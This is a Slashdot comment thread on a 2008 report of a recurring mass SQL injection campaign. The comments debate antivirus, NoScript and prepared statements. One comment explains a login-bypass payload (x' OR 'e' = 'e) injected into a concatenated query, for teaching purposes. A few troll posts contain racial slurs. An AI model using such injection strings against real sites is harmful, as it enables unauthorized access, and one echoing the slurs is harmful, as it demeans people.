Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Relentless Web Attack Hard To Kill

kdawson posted more than 5 years ago | from the stay-dead-willya dept.

Security 218

ancientribe writes "The thousands of Web sites infected by a new widespread SQL injection attack during the past few days aren't necessarily in the clear after they remove the malicious code from their sites. Researchers from Kaspersky Lab have witnessed the attackers quickly reinfecting those same sites all over again. Meanwhile, researchers at SecureWorks have infiltrated the Chinese underground in an attempt to procure a copy of the stealthy new automated tool being used in the attacks."

cancel ×

218 comments

Chinks get their Interwebs on! (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#25737073)

Chinkies broked the web. :(

This... (-1, Troll)

Anonymous Coward | more than 5 years ago | (#25737081)

...is NOT the First Post.

Re:This... (1)

stonedcat (80201) | more than 5 years ago | (#25737845)

Amazing! You're telepathetic!

Kaspersky (-1, Offtopic)

mfh (56) | more than 5 years ago | (#25737087)

It's because of security reports like this, I always recommend Kaspersky [kaspersky.com] security suite over any other anti-virus solution available (free or otherwise). These guys are in the internet-trenches fighting for a more secure internet, and a more secure planet. It is widely known that they are the best in the business. So while many users will try and limp by on free anti-virus, Kaspersky just updated all my computers with protection against these attacks.

Re:Kaspersky (1, Flamebait)

RaceProUK (1137575) | more than 5 years ago | (#25737133)

Kaspersky is so brilliant, it locks up every time I try to do anything with it.

Then again, my AVG hasn't updated properly all week...

Re:Kaspersky (4, Informative)

mfh (56) | more than 5 years ago | (#25737203)

Kaspersky is so brilliant, it locks up every time I try to do anything with it.

Then again, my AVG hasn't updated properly all week...

You're not supposed to run them at the same time. They fight for control and eventually stalemate. Uninstall AVG and reinstall Kaspersky, but by now you may have damaged your system configuration. Kaspersky is pretty brutal if it gets unhinged, but it's unstoppable if you get it configured correctly.

Re:Kaspersky (1)

RaceProUK (1137575) | more than 5 years ago | (#25737313)

Should have mentioned: Kaspersky's on my work PC, and AVG on my home PC.

Re:Kaspersky (3, Insightful)

martinw89 (1229324) | more than 5 years ago | (#25737377)

...AVG...

<mechanic>Well there's your problem.</mechanic>

Re:Kaspersky (3, Informative)

liquidpele (663430) | more than 5 years ago | (#25737333)

Thank you for that advertisement, but these are SQL Injection attacks, which an antivirus will not catch.

RTFA (1)

mfh (56) | more than 5 years ago | (#25737519)

Thank you for that advertisement, but these are SQL Injection attacks, which an antivirus will not catch.

Didn't you RTFA? This story is about how Kaspersky caught the attacks... :S

Re:RTFA (3, Funny)

Bassman59 (519820) | more than 5 years ago | (#25737943)

Didn't you RTFA?

You must be new here, in spite of that two-digit user ID!

Re:RTFA (3, Funny)

Anonymous Coward | more than 5 years ago | (#25738429)

You must be new here, in spite of that two-digit user ID

He probably is new. I saw Slashdot UID 56 for sale on E-Bay about a month ago for 17 cents or 4 sticks of Trident.

Re:RTFA (2, Informative)

liquidpele (663430) | more than 5 years ago | (#25737975)

They said the company caught the attacks and investigated them, I didn't see anywhere where it said their product caught and stopped them.

Also, you *can* write checks to block specific known SQL Injection attacks if the product also acts as a firewall, but otherwise it is impossible since there are no file system files to scan.

Re:Kaspersky (4, Funny)

Anonymous Coward | more than 5 years ago | (#25737403)

"Securing an environment of Windows platforms from abuse - external or internal - is akin to trying to install sprinklers in a fireworks factory where smoking on the job is permitted." -Gene Spafford

Re:Kaspersky (2, Interesting)

mordred99 (895063) | more than 5 years ago | (#25738741)

I take every syllable that comes out of Eugene Spafford's mouth with a pound of salt. I speak as a Purdue Graduate and Security Professional.

Re:Kaspersky (1)

dedazo (737510) | more than 5 years ago | (#25737489)

(This post brought to you by Kapersky Labs. Not detecting SQL injection vulnerabilities on servers since 2003!)

Re:Kaspersky (0)

Anonymous Coward | more than 5 years ago | (#25737629)

Maybe they were able to highjack the OP /. account using this exploit, who knows ? And it would be a really good proof of concept : "look even Slashdotter with a 2-digit ID is powerless, you're doomed, so please by our products".

Re:Kaspersky (4, Insightful)

Arancaytar (966377) | more than 5 years ago | (#25737535)

It's a bloody SQL injection attack. I'd like to see your virus checker automatically rewrite your web application to use input filtering.

What these people need is a real web application instead of some self-built PHP script - not a virus scanner, whether free or expensive.

Big Picture (4, Interesting)

mfh (56) | more than 5 years ago | (#25737707)

It's a bloody SQL injection attack. I'd like to see your virus checker automatically rewrite your web application to use input filtering.

This is going to sound like a little bit of double speak but I'll remind you that Kaspersky found these attacks were happening. Also, they are studying the behavior. Furthermore, Kaspersky protects systems from nefarious things that attackers will do, regardless of how they get on the system. Nothing is perfect with Windows, but if you look at the options, Kaspersky is the best out there.

Now of course, if you want to insist that the attacks happen whether Kaspersky is running or not, you will be correct. But what you're not saying is how LIMITED the attackers are when trying to get past Kaspersky after they get on a system.

Noscript also helps, but isn't perfect either.

Re:Kaspersky (1)

LandDolphin (1202876) | more than 5 years ago | (#25737849)

"I'd like to see your virus checker automatically rewrite your web application to use input filtering."

Now that's an Anti-Virus software I'd pay for!

Re:Kaspersky (1)

ceejayoz (567949) | more than 5 years ago | (#25737853)

What these people need is a real web application instead of some self-built PHP script - not a virus scanner, whether free or expensive.

Uh, this exploit is targeting ASP/MSSQL.

Re:Kaspersky (1)

mfh (56) | more than 5 years ago | (#25737899)

Uh, this exploit is targeting ASP/MSSQL.

And to be fair, there are two attacks going on. #1 is getting the SQL on the server (which is impossible to detect unless your code is ok) and then there are the aftermath attacks that the SQL code launches when a browser executes Javascript when browsing, WHICH KASPERSKY PROTECTS YOU AGAINST.

Unless you run a website, you won't care about the first attack, and the second one you ARE protected against if you have a decent configuration.

Re:Kaspersky (1)

Joce640k (829181) | more than 5 years ago | (#25737651)

Do you know what an SQL injection attack is?

Clue: It's not something an antivirus can ever protect people from.

No kaspersky for me (3, Funny)

jonaskoelker (922170) | more than 5 years ago | (#25738145)

zsh% apt-cache search kaspersky
zsh%

:(

Re:Kaspersky (1)

DerCorny (1227862) | more than 5 years ago | (#25738193)

So? Before you do free advertisement, do some more research: http://blogs.zdnet.com/security/?p=1516 [zdnet.com] They can't even protect their own sites ...

relentless (-1, Troll)

Anonymous Coward | more than 5 years ago | (#25737107)

Relentless, like a nigger asking for a handout?

Re:relentless (-1, Troll)

Anonymous Coward | more than 5 years ago | (#25737349)

No, more like a Republican trying to convince the public that Sarah Palin isn't full-on retarded, no matter how good she looks in a short skirt.

first post (-1, Offtopic)

Dan541 (1032000) | more than 5 years ago | (#25737109)

:P

Re:first post (0, Offtopic)

Dan541 (1032000) | more than 5 years ago | (#25737135)

Dammm,

Where's the "-1 fail"

Re:first post (2, Informative)

martinw89 (1229324) | more than 5 years ago | (#25737303)

Don't worry, your "-1 fail"® moderation is being applied at this moment. Thank you for using Slashdot©, please come again.

Re:first post (1)

windsurfer619 (958212) | more than 5 years ago | (#25737717)

Good point! We'll need a "-1 not funny" while you're at it, too!

Re:first post (1)

martinw89 (1229324) | more than 5 years ago | (#25737769)

I think you dropped this [instantrimshot.com] .

Re:first post (1)

Chris Burke (6130) | more than 5 years ago | (#25737713)

Where's the "-1 fail"

In your heart, my friend. In your heart.

Re:first post (0)

Anonymous Coward | more than 5 years ago | (#25737173)

Why is it that when someone decides they have the karma to burn and make a "first post", someone else already posted something long and informative?

If you're going to waste the karma, at least do it right. Sheesh.

Whatever happened (5, Insightful)

RaceProUK (1137575) | more than 5 years ago | (#25737111)

to fixing the hole? It's like fixing a car coolant leak by pouring more water in the radiator.

Re:Whatever happened (2, Informative)

compro01 (777531) | more than 5 years ago | (#25737283)

AFAICT, they are patching the hole, they're just finding even more holes of the same type.

Re:Whatever happened (0)

Anonymous Coward | more than 5 years ago | (#25738337)

So, basically, their rad hose is perforated. Time to get a new one, preferably from a better manufacturer.

Re:Whatever happened (1)

gurps_npc (621217) | more than 5 years ago | (#25737689)

The problem is, they don't have "a hole", they have swiss cheese. The reason they have swiss cheese is that the people responsible for securing their machines take 3 days to do something that should be done in ten minutes.

Re:Whatever happened (0)

Anonymous Coward | more than 5 years ago | (#25738243)

Has been working for us for years...

Steve B.

It's the plugins... (2, Insightful)

sam0737 (648914) | more than 5 years ago | (#25737171)

At the end of the day it's the problem of plugins...I mean, besides the fact that the website is being infected, it's the flaws and vulnerabilities of the ActiveX/Browser plugins that allow this kind of activity to be profitable.

Just yet another reason, besides bandwidth, to get Flashblock.

And install as few as browsers plugins/ActiveX as possible.

Re:It's the plugins... (1)

larry bagina (561269) | more than 5 years ago | (#25737921)

They could fill the website with links to v1agr@, svbpr1me m0rtg@g3s, and geniune r0lexxs.

noscript (5, Informative)

Manfre (631065) | more than 5 years ago | (#25737191)

NoScript is one of the best ways to avoid viruses that are distributed from the web.

Re:noscript (1)

NorQue (1000887) | more than 5 years ago | (#25737879)

Until someone discovers an exploitable bug in noscript. ;)

Re:noscript (1)

Bryansix (761547) | more than 5 years ago | (#25737945)

If you want to break a shitload of websites like uhm say the custom CRM that I support for my company that our own developers write in ASP.NET!

Re:noscript (0)

Anonymous Coward | more than 5 years ago | (#25738111)

It's rare that I care enough about visiting a website that REQUIRES Javascript for me to actually go to the trouble of enabling Javascript. Most of the time, when I see a site requiring Javascript, I assume that I am not in their target demographic, and I close that tab.

Re:noscript (1)

Bryansix (761547) | more than 5 years ago | (#25738237)

I think you missed the point that the COMPANY I WORK FOR REQUIRES I SUPPORT THIS WEBSITE! Geez. Target Demographic?! You don't even know what that term means.

Re:noscript (1, Informative)

RpiMatty (834853) | more than 5 years ago | (#25738475)

SO WHY CAN'T YOU WHITELIST THE SITE THAT YOU HAVE TO SUPPORT? Along with any other sites you support?

Its not that hard to build up a whitelist. The first time you visit a "trusted" or regular site, add it to the white list. Does it have any subdomains, or "partner" domains that you also need to add? Go ahead and add them.

So many people complain about how NoScript breaks pages, but its really not that hard at all to setup a whitelist.

Now when your redirected/accidentally click on a link to dgdrklgdr.com/e3rer it can't run any javascript on your pc.

Re:noscript (0)

Anonymous Coward | more than 5 years ago | (#25738185)

If you want to break a shitload of websites like uhm say the custom CRM that I support for my company that our own developers write in ASP.NET!

True, the first few days of using NoScript you will run into "problems" on nearly every page you visit, but that is simply the software learning what is "trusted" and what isn't (everything else). After that, NoScript is damned useful keeping the sketchy web developers away from your personal info.
If a site REQUIRES JavaScript or Flash to work (and I've never used it before) then it is not worth anyone's time to visit.

Re:noscript (1)

Manfre (631065) | more than 5 years ago | (#25738219)

The developers are doing something wrong if the CRM mandates XSS javascript.

Re:noscript (1)

Bryansix (761547) | more than 5 years ago | (#25738383)

You're doing something wrong by talking about something you have no idea about. ASP.NET is a programming language that is BOTH compiled and interpreted. The intermediate step language is run upon demand and spits out a combination of HTML and Javascript to render the webpages.

Re:noscript (3, Informative)

Manfre (631065) | more than 5 years ago | (#25738667)

I've been developing with ASP.NET (c#) since its initial beta and am very familiar with how it functions. This discussion would go a bit smoother if you would read a comment before replying to it. Noscript prevents javascript from loading on any site, until the site is explicitly given permission by the user. Approve your CRM domain(s), which will allow it to work properly. Then if it is compromised, noscript will block the javascript on the destination domain. If your server is compromised to the point where it is hosting exploits, then the IT staff needs to spend a bit more effort patching and locking things down. Noscript is not the only protection that should be used, but it greatly helps. It's like driving a car a little bit slower. You've still got a seatbelt to help keep you alive, but you should be less likely to hit something.

No, it's not. (3, Informative)

Bearhouse (1034238) | more than 5 years ago | (#25738399)

Your're right to publicise a good product that I also use and reccommend. However:

Most people that get caught by malware don't understand all these arcane details.

Most people use IE, (no noscript here..) and blindly click 'OK' when they cannot see the porn.

Bad web sites / pages don't just install viruses.*

Infiltration (2, Funny)

Anonymous Coward | more than 5 years ago | (#25737239)

SecureWorks: Can I have a copy of your super secret automated tool?

ChineseUnderground: No...

Meanwhile... (1)

girlintraining (1395911) | more than 5 years ago | (#25737251)

Secureworks... Announcing the fact that you're trying to covertly gain access to these tools rather defeats the point don't you think? It's like going into the ghetto with a sign on your back that says "Undercover Drug Officer". Secureworks, I see two possibilities for this level of stupidity; Management, and your researchers. If by some statistical fluke it was your researchers that had the idea of publicizing this... please have your researchers develop some street smarts and common sense. I don't mean this as a dig at you; This is professional advice... Get them out of the labs and back into the real world and do it now before you really embarass yourself. Now, the more likely answer is someone in management thought this would be a great opportunity for publicity. Shoot them... and use silver bullets. PHBs are notoriously hard to kill.

Re:Meanwhile... (1)

An ominous Cow art (320322) | more than 5 years ago | (#25737593)

> PHBs are notoriously hard to kill.

Only if you're working for the ship's cook.

Re:Meanwhile... (1)

jeffmeden (135043) | more than 5 years ago | (#25737615)

The post you read must have looked like this:
  "Meanwhile, researchers at SecureWorks have infiltrated the Chinese underground using the alias of S00p3r-1337 in an attempt to convince them to e-mail a copy of the stealthy new automated tool being used in the attacks to viruscheckers@secureworks.com"

Which is weird because that's not what I saw...

Infected Websites (3, Interesting)

sexconker (1179573) | more than 5 years ago | (#25737297)

Can someone explain to me how websites get infected?

Oh, that's right, running ads and other shit from shady people (directly or indirectly).

I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

Re:Infected Websites (1)

sexconker (1179573) | more than 5 years ago | (#25737339)

Just so we're clear, that includes flash and pdf.

Re:Infected Websites (1)

corsec67 (627446) | more than 5 years ago | (#25737523)

Oh, that's right, running ads and other shit from shady people (directly or indirectly).

The article says that the websites are getting hit with a sql injection [wikipedia.org] attack, so ads shouldn't be the problem, unless the ad server is vulnerable.

This probably has nothing to do with ads and more to do with failing to validate user input. (Obligatory xkcd [xkcd.com] reference)

Re:Infected Websites (1)

sexconker (1179573) | more than 5 years ago | (#25738099)

In this case, yes, but see above:

I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

Re:Infected Websites (1)

CaptSaltyJack (1275472) | more than 5 years ago | (#25738559)

You know not what you're talking about.

SQL injection attacks involve passing SQL code through the query-string. On a simple level:

An attacker sees that, and changes the URL in their browser to:

Of course, that's on a very simplistic level. They do much worse things, like throw in entire coded blocks of SQL code to do all kinds of malicious things, like insert script tags pointing to their site.

More sophisticated attackers have bots that have a catalog of online stores' known weaknesses (for instance, CandyPress - piece of garbage), and it knows exactly which pages to target.

Re:Infected Websites (1)

Hatta (162192) | more than 5 years ago | (#25738803)

I really wish websites would simply stop hosting foreign (not theirs, not trusted, not checked) code and content.

I really wish websites would simply stop expecting me to run their code.

This disgusts me (3, Insightful)

77Punker (673758) | more than 5 years ago | (#25737323)

I develop web applications for a living right now and as someone who's only been in this game for a few months, this disgusts me. I already know how to prevent SQL injection with prepared statements. It's easy to do and requires no extra knowledge, so why doesn't everyone do this?

Re:This disgusts me (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25737391)

You might know, but the intern who developped the crappy PHP4 app 8 years ago did not, and it would cost too many man days to fix the code.

Re:This disgusts me (3, Insightful)

Rycross (836649) | more than 5 years ago | (#25737411)

The problem is a frightening amount of training material on the web uses concatenated SQL strings to teach SQL. Pull up your average PHP/.Net/Java SQL tutorial and odds are that it will be concatenating strings. Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

Re:This disgusts me (4, Funny)

Pope (17780) | more than 5 years ago | (#25737517)

I'd say fully half of all the programmers are going to be below average...

Re:This disgusts me (4, Funny)

77Punker (673758) | more than 5 years ago | (#25737553)

I'd say fully half of them will be below median.

Re:This disgusts me (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25737703)

I say that fully half of programmers will be below median assuming theres an even number of programmers.
All bets are off if theres an Odd number of programmers.

Re:This disgusts me (1)

spiffmastercow (1001386) | more than 5 years ago | (#25737725)

That depends on two things:
1.) Are there equal programmers?
2.) Is the number of programmers even or odd?

Re:This disgusts me (3, Insightful)

corsec67 (627446) | more than 5 years ago | (#25737569)

Throw that in with the fact that roughly half of the programmers reading that are going to be below average

Um for anything that is approximately normally distributed,... half of the X are going to be below average. (Especially if it is a continuous variable and you use the median)

Re:This disgusts me (0)

Anonymous Coward | more than 5 years ago | (#25738371)

I believe you missed the joke.

Re:This disgusts me (1)

overunderunderdone (521462) | more than 5 years ago | (#25738447)

*woosh*

Erm - yes, it was a joke... (0)

Anonymous Coward | more than 5 years ago | (#25738813)

I guess you need to have someone explain it...

Re:This disgusts me (1)

Not The Real Me (538784) | more than 5 years ago | (#25737873)

"...Pull up your average PHP/.Net/Java SQL tutorial and odds are that it will be concatenating strings..."

That and I run into programmers who have over ten years working in the field who absolutely refuse to work with databases any other way. They freak out when you tell them data access is via parameterized stored procedures.

Re:This disgusts me (2, Insightful)

CodeBuster (516420) | more than 5 years ago | (#25738641)

Throw that in with the fact that roughly half of the programmers reading that are going to be below average, and there you go.

That is what comes of outsourcing and offshoring especially, but there are still managers out there who refuse to acknowledge what I like to call the Iron Law of Software Development or more generally the Project Triangle [wikipedia.org] (good, fast, cheap...pick two).

Re:This disgusts me (0, Troll)

tripdizzle (1386273) | more than 5 years ago | (#25737481)

Not trying to insult here (I'm no programmer), but since you say you've been doing what you are doing for just a few months, I am guessing the attack is a more advanced than what your prepared statements are going to block, since a major site like travelocity is being hit, and Kaspersky is not yet able to find a solution.

Re:This disgusts me (1)

Jeff Hornby (211519) | more than 5 years ago | (#25737711)

No, he's right. Prepared statements are how you block SQL Injection attacks.

Re:This disgusts me (4, Informative)

NNKK (218503) | more than 5 years ago | (#25737757)

You're right, you're no programmer. Go read up:

http://en.wikipedia.org/wiki/SQL_injection [wikipedia.org]

Prepared (or parametrized) statements are an easy and absolute defense against SQL injection attacks. The OP is right, the fact that such attacks still succeed is disgusting and inexcusable.

Re:This disgusts me (2, Funny)

77Punker (673758) | more than 5 years ago | (#25737795)

The more I think about it, the more I think your post should read

"...disgusting, inexcusable, and potentially hilarious."

Re:This disgusts me (1)

dzfoo (772245) | more than 5 years ago | (#25738103)

I agree. Headlines with "SQL injection" make me chuckle; but including Travelocity.com and other high profile sites in the victims list is priceless!

      -dZ.

Re:This disgusts me (1)

tripdizzle (1386273) | more than 5 years ago | (#25737995)

Then why hasn't Kaspersky or Travelocity figured this out?

Re:This disgusts me (3, Insightful)

77Punker (673758) | more than 5 years ago | (#25738129)

Kaspersky can't figure it out because a virus scanner can't fix a web application. Fixing SQL injections is beyond their realm.

Travelocity can't figure it out because their developers must suck. Travelocity is well-known because they have a decent service, not because the software that runs the service is really great software.

Re:This disgusts me (2, Insightful)

delirium28 (641609) | more than 5 years ago | (#25738135)

They're most likely trying to find a solution that doesn't require them to revisit and re-code a large portion of their site. They most likely want a band-aid solution rather than fix the underlying problem.

Re:This disgusts me (4, Insightful)

Emb3rz (1210286) | more than 5 years ago | (#25738159)

You're working off of the false assumption that security is about knowledge.

We know abundantly well exactly how SQL injection attacks occur, and we also have many tools at our disposal to -absolutely- prevent them. What we don't have is the cooperation or effort from programmers on a widespread basis. Many are simply too lazy to research and implement reasonable security measures. It's easier to pretend that there are no ways whatsoever that anything can go wrong with your code because when you tested it it worked right. This willfull turning a blind eye to well-established security caveats is what has given us this terrible and prevalent security problem. It's easier to write code that checks nothing, it's quicker to do so, and it requires less think-juice on the part of the lazy programmer.

Re:This disgusts me (1)

JoelisHere (992325) | more than 5 years ago | (#25738381)

More than likely the lack of cooperation is more from the managers and project managers that when told by their programmers that all their SQL queries need to be rewritten to use prepared statements to prevent SQL injection attacks, response was, "Well we haven't had any problems yet. And that would take too long."

Re:This disgusts me (1)

dzfoo (772245) | more than 5 years ago | (#25738163)

Kaspersky has, I can assure you; they just figured that there will always be stupid programmers out there doing crap, buggy code, and decided to help mitigate the consequences.

As for Travelocity, they probably hired cheap programmers or a third-party contractor who employs inexperienced code monkeys. Bad programmers are more common than you think!

      -dZ.

Re:This disgusts me (1)

blincoln (592401) | more than 5 years ago | (#25738167)

Prepared (or parametrized) statements are an easy and absolute defense against SQL injection attacks.

They're actually not an absolute protection. If anything you are doing ends up working with stored procedures that do concatenation internally, your prepared statements can still end up allowing a SQL injection.

Prepared statements are a very, very good idea that provides a lot of built-in resistance to SQL injection, but they're not bulletproof.

Re:This disgusts me (1)

dzfoo (772245) | more than 5 years ago | (#25738231)

Well, of course, you should never underestimate the tenacity of stupid programmers.

Re:This disgusts me (4, Insightful)

Emb3rz (1210286) | more than 5 years ago | (#25738083)

The idea of a SQL Injection attack is to pass a parameter in such a way that it changes the structure of the query itself. Typical beginner's SQL query:

sql = "SELECT * FROM Users WHERE Username = '" & Request.Form("Username") & "' AND Password = '" & Request.Form("Password") & "';"

This uses 'String Concatenation' to build a line of text from several smaller parts. The completed string is then, in this example executed by a database. A new query is dynamically created and executed based on the text passed to it. Thus, we are able to at this point change what query will be run. Form data:

Username = "Admin"
Password = "x' OR 'e' = 'e"

So when the string is being put together, we get:

SELECT * FROM Users WHERE Username = 'Admin' AND Password = 'x' OR 'e' = 'e';

Certainly, even with no programming experience, one can see that the letter E will always be equivalent to the letter E. Thus, any validation of the password will return a false positive.

Prepared statements avoid this whole deal by only allowing you to pass parameters. The query is already set in stone. You cannot change how it basically works, only its criteria / filtering / etc. A prepared statement would execute basically:

SELECT * FROM Users WHERE Username = "Admin" AND Password = "x' OR 'e' = 'e";

Since the query does not change dynamically when it's executed as a prepared statement, you can't add your logical 'OR' operator after having broken out of your parameter. You just get no rows returned, as should be the case.

Re:This disgusts me (1)

Yetihehe (971185) | more than 5 years ago | (#25737565)

It's very often simple laziness. In latest project which I'm working on I did one function: function q($str). It's even easier to use than prepared statements, it just filters everything not supposed to be there. But why other dev's don't always use it is beyound me.

Re:This disgusts me (1)

larry bagina (561269) | more than 5 years ago | (#25737983)

I'm not sure how that's simpler, but you might still be vulnerable with invalid utf-8 strings.

The link above leads to an infected site (0)

Anonymous Coward | more than 5 years ago | (#25737335)

Not really - but it would be ironic if it was

Install a proxy (4, Interesting)

gfilion (80497) | more than 5 years ago | (#25737443)

We had this problem a few months back at work. Old but necessary asp web sites kept getting infected. It only took a few hours to install a reverse proxy with mod_security on EC2 and we were in the clear.

Full story on my blog:
http://guillaume.filion.org/blog/archives/2008/05/i_love_ec2_and_rightscale.php [filion.org]

Re:Install a proxy (3, Informative)

merreborn (853723) | more than 5 years ago | (#25738573)

mod_security is a reactive security measure. It's blacklist based, which makes the classic error of attempting to "enumerate badness" [ranum.com] .

While it's great if you've identified an existing threat to an application you cannot properly secure, it does nothing to protect you against future attacks using less obvious techniques.

mod_security alone is not an adequate solution. It's still necessary to proactively write secure applications in the first place, which means making sure you're never allowing raw, unfiltered/unescaped user data into places where it shouldn't go.

yet another ugly side of DRM (3, Insightful)

Aoet_325 (1396661) | more than 5 years ago | (#25737453)

"The toolkit is protected with a layer of digital rights management and appears to be sold mainly in China. "

this is why I don't believe in "Tusted" computing.
When software or hardware are used to take control of a computer away from that computer's owner bad things will happen.

Chinese underground (4, Funny)

AragornSonOfArathorn (454526) | more than 5 years ago | (#25737501)

Is it like Big Trouble in Little China, with the lightning ninjas and floating eye thing? Did they get Kurt Russel to help?

If so, that would be AWESOME.

No DRM trolls? (4, Funny)

genner (694963) | more than 5 years ago | (#25737685)

Did everyone miss the fact that the toolkit resposible includes some hefty DRM.

Where's the outrage?
Why aren't we demmanding an open source solution?

notSoGreat Firewall O' China (1)

sgt scrub (869860) | more than 5 years ago | (#25737973)

Sure! They can block users from nasty ol' Capitolist porn. But, do they keep users from attacking overseas networks? Noooooo.

Sorry. I'm in touch with my inner child today.

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...